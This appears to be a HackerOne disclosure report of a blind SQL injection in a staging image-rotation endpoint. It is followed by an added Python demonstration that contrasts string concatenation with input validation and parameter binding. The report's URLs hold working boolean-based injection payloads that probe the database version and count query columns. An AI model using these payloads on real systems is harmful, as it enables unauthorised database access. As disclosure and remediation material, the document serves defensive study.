Uzbey: SQL Injection

2014-08-08T04:22:29
ID H1:23014
Type hackerone
Reporter yappare
Modified 2014-11-02T19:39:08

Description

https://staging.uzbey.com/rotate-image?fid=2841+and+substring(version(),1,1)=4 FALSE
https://staging.uzbey.com/rotate-image?fid=2841+and+substring(version(),1,1)=5 TRUE

https://staging.uzbey.com/rotate-image?fid=2841+and+1=1+order+by+1-- TRUE
https://staging.uzbey.com/rotate-image?fid=2841+and+1=1+order+by+2-- FALSE

FALSE = will redirect to access denied
TRUE = redirected to page not found

fid must be a valid image id
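
Added example, not part of the original report and not Uzbey's code: it shows why the two `order by` requests above produce different outcomes when `fid` is concatenated into the query text, and how integer validation plus a bound parameter makes them indistinguishable. An in-memory SQLite table stands in for the unknown backend, and the table name `images` and the function names are hypothetical.

```python
import sqlite3

def make_db():
    # Constructed in-memory table standing in for the image store (assumption).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE images (id INTEGER PRIMARY KEY, owner TEXT)")
    db.execute("INSERT INTO images VALUES (2841, 'alice')")
    return db

def lookup_concat(db, fid):
    """'Before' form: fid is pasted into the SQL text, so it is parsed as SQL."""
    try:
        row = db.execute("SELECT id FROM images WHERE id = " + fid).fetchone()
    except sqlite3.Error:
        return "error"
    return "found" if row else "missing"

def lookup_bound(db, fid):
    """Hardened form: reject non-numeric input, then bind the value as data."""
    if not (fid.isascii() and fid.isdigit()) or len(fid) > 18:
        return "rejected"
    row = db.execute("SELECT id FROM images WHERE id = ?", (int(fid),)).fetchone()
    return "found" if row else "missing"

# fid values taken from the report's URLs, with '+' decoded to spaces.
PROBES = ["2841", "2841 and 1=1 order by 1--", "2841 and 1=1 order by 2--"]

def compare():
    # Returns (probe, outcome with concatenation, outcome with binding).
    db = make_db()
    return [(p, lookup_concat(db, p), lookup_bound(db, p)) for p in PROBES]

if __name__ == "__main__":
    for probe, before, after in compare():
        print(f"{probe!r:32} concat={before:8} bound={after}")
```

With concatenation the two `order by` values yield different results, which is the response difference the report relies on; with validation and binding both are rejected identically.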